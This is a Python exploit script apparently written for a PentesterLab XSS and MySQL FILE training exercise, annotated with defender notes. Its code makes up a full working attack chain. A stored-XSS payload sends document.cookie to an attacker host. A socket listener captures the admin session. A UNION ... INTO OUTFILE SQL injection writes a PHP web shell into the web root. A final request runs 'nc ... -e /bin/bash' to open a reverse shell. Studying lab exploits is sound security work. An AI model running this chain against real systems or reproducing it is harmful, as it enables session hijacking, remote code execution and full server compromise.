import requests
import socket
import sys
import random
import string
# Usage banner printed by main(); the box-drawing art is left exactly as published.
banner="""
██ ██ ███████ ███████ ████████ ██████ ██████ ██████ ███████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
███ ███████ ███████ ██ ██ ██ ██████ ██ █████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ███████ ███████ ██ ██████ ██ ██ ██████ ███████
@intx0x80
https://pentesterlab.com/exercises/xss_and_mysql_file/course
"""
# Address the callback listener in server() binds to: all interfaces, TCP 80.
# Binding 0.0.0.0:80 needs elevated privileges on most systems and exposes the
# listener to every network the host is attached to.
host="0.0.0.0"
port=80
# Shared HTTP session; SQLinj() sets the PHPSESSID cookie on it so later
# requests through it are made as the captured session.
adminsess=requests.Session()
# Defined but not referenced by any function in this file; requests calls
# below do not pass it, so no traffic is proxied.
proxies={"http":"127.0.0.1:8080"}
def send_comments(ip,lhost):
    """Submit a comment whose body is a <script> tag to post_comment.php.

    The stored script, when rendered unescaped in a victim's browser, makes
    that browser request an image from ``lhost`` with ``document.cookie``
    appended to the path -- i.e. a stored-XSS cookie exfiltration step.

    Args:
        ip: target host (used in the POST URL).
        lhost: host the injected script will call back to.

    Returns:
        True if the server answered with a 302 (the comment was accepted),
        otherwise None (implicit fall-through).

    Defender notes: the injection point is the comment ``text`` field echoed
    without output encoding; an HttpOnly session cookie is not readable via
    ``document.cookie``; a stored comment containing an external <img>/<script>
    source, or an outbound image fetch carrying a session id in the path, is
    the detection signal.
    """
    data={"title":"PW","author":"guest","text":f"<script>document.write('<img src=http://{lhost}/'+document.cookie+' />');</script>","submit":"Submit"}
    # allow_redirects=False so the 302 itself is observed rather than followed.
    req=requests.post(f"http://{ip}//post_comment.php?id=1",data=data,allow_redirects=False)
    if req.status_code==302:
        return True
def server(host,lport):
    """Accept one TCP connection and pull a cookie value out of its request line.

    Listens on ``(host, lport)``, accepts a single client, reads at most one
    4096-byte chunk, keeps the text before the first ``HTTP`` in the request
    line, drops the first 5 bytes (presumably the ``GET /`` prefix -- not
    verified here), and returns whatever follows the first ``=``.

    Args:
        host: interface to bind.
        lport: TCP port to bind.

    Returns:
        The substring after the first ``=`` in the parsed request path.

    Notes: the socket is never closed and only one recv() is issued, so a
    request split across packets is truncated; ``split("=")[1]`` raises
    IndexError if no ``=`` is present. A browser-initiated HTTP request to a
    non-web host carrying a session id in the URL is what a network sensor
    would see at this step.
    """
    so = socket.socket()
    # Allow quick re-bind after a previous run left the port in TIME_WAIT.
    so.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    so.bind((host,lport))
    so.listen()
    print("[*] Server Running...")
    (handler, conn) = so.accept()
    data = handler.recv(4096)
    cookies=data.split(b"HTTP")[0][5:].decode("UTF-8")
    return cookies.split("=")[1]
def SQLinj(ip,admincookie,filename):
    """Replay a captured session and send a UNION/INTO OUTFILE query via edit.php.

    Sets ``PHPSESSID`` on the shared ``adminsess`` session, requests
    ``admin/edit.php`` with an ``id`` value that carries a ``UNION SELECT ...
    INTO OUTFILE`` targeting ``/var/www/images/``, then probes ``/images/`` to
    see whether a PHP file now exists there.

    Args:
        ip: target host.
        admincookie: session id value to present as PHPSESSID.
        filename: accepted by the signature; see the body for how it is used.

    Returns:
        True if the follow-up GET returns 200, otherwise None.

    Defender notes: the root cause is string-built SQL on ``id`` -- a
    parameterized query removes it. Writing into the web root additionally
    requires the DB account to hold FILE privilege, ``secure_file_priv`` to be
    unset/permissive, and the directory to be writable by the DB server
    process; denying any one of these stops the file write. Request logs with
    ``union select`` / ``into outfile`` in the query string, and new ``.php``
    files appearing under an images directory, are the detection signals.
    """
    adminsess.cookies.set("PHPSESSID",str(admincookie))
    url=f"http://{ip}/admin/edit.php?id=-1%20union%20select%201,%27%3C?php%20system($_GET[\\%27cmd\\%27]);%20?%3E%27,3,4%20into%20outfile%20%27/var/www/images/(unknown).php%27"
    req=adminsess.get(url)
    # Unauthenticated probe: 200 here means the written file is being served.
    req2=requests.get(f"http://{ip}//images/(unknown).php")
    if req2.status_code==200:
        return True
def reverse_shelll(ip,filename,lhost,lport):
    """Issue one GET to the written PHP file passing a ``cmd`` query parameter.

    The response is discarded; the function returns None and reports nothing.

    Args:
        ip: target host.
        filename: accepted by the signature; see the body for how it is used.
        lhost: host named in the ``cmd`` value.
        lport: port named in the ``cmd`` value.

    Defender notes: the observable at this step is the web server process
    spawning a shell and opening an outbound TCP connection; egress filtering
    from the web tier and alerting on child processes of the web server user
    cover it, and the earlier file write is the point to prevent.
    """
    url=f"http://{ip}/images/(unknown).php?cmd=nc+{lhost}+{lport}+-e+/bin/bash"
    requests.get(url)
def main():
    """Parse ``<target> <LHOST> <LPORT>`` from argv and run the steps in order.

    Exits with -1 after printing usage when the argument count is wrong.
    Each step only runs if the previous one returned True; ``server()`` blocks
    until the callback connection arrives.
    """
    if len(sys.argv) != 4:
        print(banner)
        print ("(+) usage: %s <target> <LHOST> <LPORT> " % sys.argv[0])
        print ('(+) eg: %s 172.17.0.2 172.17.0.2 443' % sys.argv[0])
        sys.exit(-1)
    print(banner)
    ip=sys.argv[1]
    lhost=sys.argv[2]
    # Five random ASCII letters; random (not secrets) is fine here since the
    # value is not security-sensitive on this side.
    filename=''.join(random.choice(string.ascii_letters) for _ in range(5))
    lport=int(sys.argv[3])
    if send_comments(ip,lhost):
        # Uses the module-level host/port (0.0.0.0:80), not lhost/lport.
        cookie=server(host,port)
        if SQLinj(ip,cookie,filename):
            print("[+] Check your Listener :) ")
            reverse_shelll(ip,filename,lhost,lport)
    #print(cookie)
# Script entry point; importing the module runs nothing.
if __name__ == "__main__":
    main()